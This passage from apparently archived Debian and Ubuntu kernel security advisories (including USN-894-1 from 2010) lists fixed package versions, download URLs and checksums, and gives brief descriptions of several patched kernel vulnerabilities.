http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b_2.6.24-6~etchnhalf.9etch3_mipsel.deb Size/MD5 checksum: 248174 50e84058a7d710f013f92e1fe68a705c

powerpc architecture (PowerPC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 322474 2d7e39cf0b78d98125a0baba377f1af0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 19195556 bb2bd8e203cee7b3c6739d5c5d11901a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 324008 3b021bb4b3dac72dc68e701f4a209939 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 295928 ca2bf1c3c12f409e469c516877a8e91c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc64_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 21170062 4022dbff73ebfde3a846ce38896cf09c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 322502 4b76cce255e1fcc72cb82053cd34a1a2 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-miboot_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 17459240 ad749c6e735e58d775b7190ff3d26e50 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-powerpc_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 83466 a041c0fdb383832cf725723ce22e40c0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 83430 392d415932625b1a69dc6494d2f737e0 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 3674486 200fdcca2140a97f961a37d70db620d5 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-powerpc-smp_2.6.24-6~etchnhalf.9etch3_powerpc.deb Size/MD5 checksum: 19487244 b42ad8431643d89a1f8b0e6e0aaeb39e

s390 architecture (IBM S/390)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 83532 a1c34683fe304f1a86bbc28f6cbc654c http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 83556 bf7fed1ef4da92d782409fe8345f861a http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 6976486 5b5db16fea4336068bbcd5bff56ad575 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 7228452 75c044fa17d6071de36579a1491c2e1b http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 3431908 18825f85900faca81b21e48d43af6ee7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390x_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 197006 0a44248e77ec1ff027edd032ebe5b2c6 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-s390-tape_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 1503494 bd7f7b7bd4e120472bf60ad0b7d9184e http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-s390_2.6.24-6~etchnhalf.9etch3_s390.deb Size/MD5 checksum: 196810 f03114c2f256a97b15f88d2659f9501b

sparc architecture (Sun SPARC/UltraSPARC)

http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 83428 1ea7179752fbb45e10e731991583db68 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 263546 ef894d6917cbe692ec9197048538d5e7 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-common_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 3651402 a0194c650712040f81e97d5b3b62bc79 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 264892 0b642e20f00b52c20b6ae9e0ee1f78b8 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-headers-2.6.24-etchnhalf.1-all-sparc_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 83442 6d109d7f131dab564736e2ac6a85dd29 http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64-smp_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 13318532 dbce062bfa560c331b75bed073868e1d http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-image-2.6.24-etchnhalf.1-sparc64_2.6.24-6~etchnhalf.9etch3_sparc.deb Size/MD5 checksum: 13019464 b0b153fafa43b650e996a9d84bbb26d7

These changes will probably be included in the oldstable distribution on its next update. =========================================================== Ubuntu Security Notice USN-894-1 February 05, 2010 linux, linux-source-2.6.15 vulnerabilities CVE-2009-4020, CVE-2009-4021, CVE-2009-4031, CVE-2009-4138, CVE-2009-4141, CVE-2009-4308, CVE-2009-4536, CVE-2009-4538, CVE-2010-0003, CVE-2010-0006, CVE-2010-0007, CVE-2010-0291 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 Ubuntu 9.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.82 linux-image-2.6.15-55-686 2.6.15-55.82 linux-image-2.6.15-55-amd64-generic 2.6.15-55.82 linux-image-2.6.15-55-amd64-k8 2.6.15-55.82 linux-image-2.6.15-55-amd64-server 2.6.15-55.82 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.82 linux-image-2.6.15-55-hppa32 2.6.15-55.82 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.82 linux-image-2.6.15-55-hppa64 2.6.15-55.82 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.82 linux-image-2.6.15-55-itanium 2.6.15-55.82 linux-image-2.6.15-55-itanium-smp 2.6.15-55.82 linux-image-2.6.15-55-k7 2.6.15-55.82 linux-image-2.6.15-55-mckinley 2.6.15-55.82 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc 2.6.15-55.82 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.82 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.82 linux-image-2.6.15-55-server 2.6.15-55.82 linux-image-2.6.15-55-server-bigiron 2.6.15-55.82 linux-image-2.6.15-55-sparc64 2.6.15-55.82 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.82

Ubuntu 8.04 LTS: linux-image-2.6.24-27-386 2.6.24-27.65 linux-image-2.6.24-27-generic 2.6.24-27.65 linux-image-2.6.24-27-hppa32 2.6.24-27.65 linux-image-2.6.24-27-hppa64 2.6.24-27.65 linux-image-2.6.24-27-itanium 2.6.24-27.65 linux-image-2.6.24-27-lpia 2.6.24-27.65 linux-image-2.6.24-27-lpiacompat 2.6.24-27.65 linux-image-2.6.24-27-mckinley 2.6.24-27.65 linux-image-2.6.24-27-openvz 2.6.24-27.65 linux-image-2.6.24-27-powerpc 2.6.24-27.65 linux-image-2.6.24-27-powerpc-smp 2.6.24-27.65 linux-image-2.6.24-27-powerpc64-smp 2.6.24-27.65 linux-image-2.6.24-27-rt 2.6.24-27.65 linux-image-2.6.24-27-server 2.6.24-27.65 linux-image-2.6.24-27-sparc64 2.6.24-27.65 linux-image-2.6.24-27-sparc64-smp 2.6.24-27.65 linux-image-2.6.24-27-virtual 2.6.24-27.65 linux-image-2.6.24-27-xen 2.6.24-27.65

Ubuntu 8.10: linux-image-2.6.27-17-generic 2.6.27-17.45 linux-image-2.6.27-17-server 2.6.27-17.45 linux-image-2.6.27-17-virtual 2.6.27-17.45

Ubuntu 9.04: linux-image-2.6.28-18-generic 2.6.28-18.59 linux-image-2.6.28-18-imx51 2.6.28-18.59 linux-image-2.6.28-18-iop32x 2.6.28-18.59 linux-image-2.6.28-18-ixp4xx 2.6.28-18.59 linux-image-2.6.28-18-lpia 2.6.28-18.59 linux-image-2.6.28-18-server 2.6.28-18.59 linux-image-2.6.28-18-versatile 2.6.28-18.59 linux-image-2.6.28-18-virtual 2.6.28-18.59

Ubuntu 9.10: kernel-image-2.6.31-108-imx51-di 2.6.31-108.21 linux-image-2.6.31-19-386 2.6.31-19.56 linux-image-2.6.31-19-generic 2.6.31-19.56 linux-image-2.6.31-19-generic-pae 2.6.31-19.56 linux-image-2.6.31-19-ia64 2.6.31-19.56 linux-image-2.6.31-19-lpia 2.6.31-19.56 linux-image-2.6.31-19-powerpc 2.6.31-19.56 linux-image-2.6.31-19-powerpc-smp 2.6.31-19.56 linux-image-2.6.31-19-powerpc64-smp 2.6.31-19.56 linux-image-2.6.31-19-server 2.6.31-19.56 linux-image-2.6.31-19-sparc64 2.6.31-19.56 linux-image-2.6.31-19-sparc64-smp 2.6.31-19.56 linux-image-2.6.31-19-virtual 2.6.31-19.56 linux-image-2.6.31-211-dove 2.6.31-211.22 linux-image-2.6.31-211-dove-z0 2.6.31-211.22 linux-image-2.6.31-304-ec2 2.6.31-304.10

After a standard system upgrade you need to reboot your computer to effect the necessary changes.

ATTENTION: Due to an unavoidable ABI change (except for Ubuntu 6.06) the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. Ubuntu 9.10 was not affected. (CVE-2009-4021)

It was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. Ubuntu 6.06 was not affected. Ubuntu 6.06 was not affected. (CVE-2009-4138)

Tavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)

Neil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames. (CVE-2009-4536, CVE-2009-4538)

It was discovered that "print-fatal-signals" reporting could show arbitrary kernel memory contents. A local attacker could exploit this, leading to a loss of privacy. (CVE-2010-0003)

Olli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. Only Ubuntu 9.04 and 9.10 were affected. A local attacker could disrupt network traffic, leading to a denial of service. (CVE-2010-0291)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz
  Size/MD5:  2928444 765d0254f54d27d447de8f0b39548848
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.dsc
  Size/MD5:     2921 682576890de917043eccf6fc9398aed2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.82_all.deb
  Size/MD5:  5170062 ef1a9c95890c4ba600a3e5523d49bb59
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.82_all.deb
  Size/MD5:    96386 b184441d2f44037554d037d217688393
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb
  Size/MD5: 44742098 b5215eb163e357a179dbf36169ae1fa2

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    22350 d8934981c2fdd09168a5e576cc1b809a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    44768 74be7582e8f82aeb48af59731ce128be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     2312 d464c76f98a4142add7a69aca1305739
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36294 a65060e99feff7e2ecef38be6d92fbc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   102366 04d59c868ce03dc83b69116b022735b8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38892 e80a653bb000e86f38da594d4bc1742d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49160 a512718368004f81e83063ea8972c871
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   176612 81ab4c185b3af1dea1a082283c1ec9b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    36776 fcb0833daefa645545a2451824094b21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   142346 3e6446140bfad0b19c512c69377d8026
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    51060 a11ceed7ccb1b96c2a8b2e7f840061b9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   140710 e1789bb9d7cdd542a862e8ef209de802
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   287606 f3cc835959f215c209dc5a825596849c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    97828 05627ddbba40a6517ae7f8ca75f195c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1652102 c9eea2df3fdde2a5e7d2f4dff99e6772
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5:   872314 6e8f80e117e13665c95fb75593853d49
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5:   872448 1a70a906bccd7642241535f79feddb57
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5:   874570 0da9cd27666b58b5328e18dbc01c9b2e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5:   872194 375aad441654cdcd2338c5809e6319ad
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_amd64.deb
  Size/MD5:  6926870 c5868857ae3e12da5ffd91ec60d75501
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb
  Size/MD5: 20817720 06e066129d82d4fa8e41a2a058dcb9f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb
  Size/MD5: 20798158 1e5bf064dc2aab9880b30448d06eba9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb
  Size/MD5: 21635636 0bb9fd3f753b4dcedf70fa8f36c48467
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.82_amd64.deb
  Size/MD5: 19905244 a04e5f6463fe334c28598cbf13506043
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    15630 8d1da510f959f7b9a2d0aa73ab80ae39
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   240360 20cd65fa275cfe8a83743ddb5a95f528
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   202666 71d8be83541874d6c675945838b9e223
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1048610 9125e9e6c294bb450e37643b3ed7397e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1543634 ff7af4dcfc269a529f0adef3823a7244
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   161692 5623fa9ad6b280d0a5271917e89ca8ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9832 bd5218587371f5b309ef2d1f77f98420
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    80870 20f034d6199d2902130f8bba12f48afe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    49294 e4a805200acaaea274e67995602294e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    35158 0869bee234a54b1afe362123606efe66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    70890 74ad81f0209c505c41d61c143b90f879
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     6218 ab28cdccb61315cac14d9046821e264d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:     9060 6b179cd944eb7f83f03147e09025e6be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    57924 5465064d051dec863ad3f4f1a91553f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   123380 18eabdae11c2d77a1694f0cd467107a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   101078 efbe32714c0fed5aec8a70095af299df
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    79272 2fbe8585b11e0fa73fad8e94298082bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:  1595398 3e11b94ed4701d1d84b6aeb303782d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    72352 e413c3057779de1b3c8f0c4d8d7fb577
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    12648 41487d8dc828d7f94a5c8ed495f06a99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    33806 ebf707126fa6326899d648786afa8779
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   138512 ff1e0d4f0e9c5efc7bbae4d92194da5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:    38938 75eb074224a6373013e621cdd5931a51
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb
  Size/MD5:   278876 1586e5c6fc3fedf7f63f19c35a4fd9e8

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    18976 940a7c03cfe47e9d0543f49849c8765f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    43482 466c625f614e3624fa548bc5f96efa74
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   105216 d45ce18fb4d9c2cf5da6d14ae69a86c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:     2284 de2293fa5c6e5493307a1913b606ad20
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    34572 4e302b4f7144fd504b2475a4103a3bf5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    97044 eeafb6c943244dd33659e7e7db9a9f76
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    37128 d4d67e516f236bf54a00697b71a3219b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    44122 1657e3520cbd2fbc832cf91bd6366a38
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   167738 7431ddaa7c8f0c9b6e583129cdc839f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    33954 8251d509fb9bacd314f62cc90bda5b96
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   137972 9b8295fffc47ab4cf16ec34f7ef8b7aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:    46892 c12096744faa1ca0735b62ea045b0c65
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   133162 5805bb2e2bfab6158d8d217b08079cc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   273806 be7956f256f494fe4f40e7e7129bdcd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:   102330 d6a81f9c342c0ebe2010b66d4a7c59ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.82_i386.udeb
  Size/MD5:  1597678 ab989d0c749b837c67a2a839f139fbb2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5:   863294 c444f51c8b2752c6a7bb7e6890917ae2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5:   862506 1508b314277964abb0d05e8a274d2a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5:   863628 69ee54c68825997e29779c3a2ab66625
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5:   866414 fa045eb17626dde56b96d70431e9515b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.82_i386.deb
  Size/MD5:   865826 30916e33e56490d9a2acf31c03690e64
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_i386.deb
  Size/MD5:  6918500 a2bb7aa892eb2d21ea3d04f519b72482
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.82_i386.deb
  Size/MD5: 21724666 e1390cea2d5e21dee938aaf3f88786f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb
  Size/MD5: 22516786 35a5512e74cf490346c35fd56f695fca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.82_i386.deb
  Size/MD5: 22265258 07155a925272e66ace552f82d16b1b79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb
  Size/MD5: 23626692 d229112410ce8c9c9947f2f7cd32c883
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.82_i386.deb
